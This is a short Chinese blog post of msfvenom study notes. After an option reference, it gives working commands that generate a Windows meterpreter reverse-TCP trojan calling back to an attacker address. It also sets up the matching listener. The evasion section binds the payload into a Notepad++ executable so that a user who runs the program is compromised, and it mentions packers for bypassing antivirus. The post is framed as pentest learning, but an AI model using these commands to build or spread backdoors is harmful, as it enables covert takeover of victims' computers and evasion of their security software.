msf Msfvenom

Metasploit之Msfvenom实战渗透 - FreeBuf网络安全行业门户

Metasploit(MSF)渗透测试入门 - 知乎 (zhihu.com)

1、介绍

Msfvenom用于生成木马。

 

-l,--list <type>
# 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等

-p,--payload <payload>
# 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取

--list-options
# 列出--payload <value> 的标准,高级和规避选项

-f,--format <format>
# 指定 Payload 的输出格式(使用 --list formats 列出)

-e,--encoder <encoder>
# 指定使用的 Encoder (使用 --list encoders 列出)

--sec-name <value>
# 生成大型Windows二进制文件时使用的新名称。默认值:随机4个字符的字符串

--smallest
# 使用所有可用的编码器生成最小的payload

--encrypt <value>
# 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)

--encrypt-key <value>
# 用于加密的密钥

--encrypt-iv <value>
# 加密的初始化向量

-a,--arch <arch>
# 指定目标系统架构(使用 --list archs 列出)

--platform <platform>
# 指定目标系统平台 (使用 --list platforms 列出)

-o,--out<path>
# 保存payload文件

-b,--bad-chars <list>
# 设置需要在 Payload 中避免出现的字符,如:'\x00\xff'

-n,--nopsled <length>
# 指定 nop 在 payload 中的数量

-s,--space <length>
# 设置未经编码的 Payload 的最大长度

--encoder-space <length>
# 编码后的 Payload 的最大长度

-i,--iterations <count>
# 设置 Payload 的编码次数

-c,--add-code <path>
# 指定包含一个额外的win32 shellcode文件

-x,--template<path>
# 指定一个特定的可执行文件作为模板

-k,--keep
# 保护模板程序的功能,注入的payload作为一个新的进程运行

-v,--var-name <value>
# 指定一个变量名(当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码,追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)

-t,--timeout <second>
# 设置从STDIN读取payload的等待时间(默认为30,0为禁用)

-h,--help
# 帮助

2、使用

msfvenom是用来生成后门的软件,在目标上执行后门,在本地监听上线。

msfvenom在shell里使用,不是msfconsole终端

病毒分为破坏性的和共存性的

2.1 永恒之蓝示例

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe
  • -p payload
  • 系统/架构/作用/方式
  • 本地ip和本地端口,是自主设置的
  • -f format
  • 作用之后生成文件

一般会被防火墙过滤,需要免杀

2.2 

use exploit/multi/handler
//三个必须的设置,需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run

用户双击exe运行之后,攻击者就会收到。

3、权限维持和二次

4、免杀

捆绑木马:下载正常程序,然后捆绑,当用户收到软件执行后会触发。

(可以绕过火绒,但无法绕过对文件校验的360.且需要注意国内程序默认一般是32,无法植入64位的木马)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe

加壳:本身是保护软件不被反编译,不被抄袭。分为压缩壳、加密壳

通过加壳软件使用,比如themida

posted @ 2023-07-31 18:37  挖洞404  阅读(97)  评论(0编辑  收藏  举报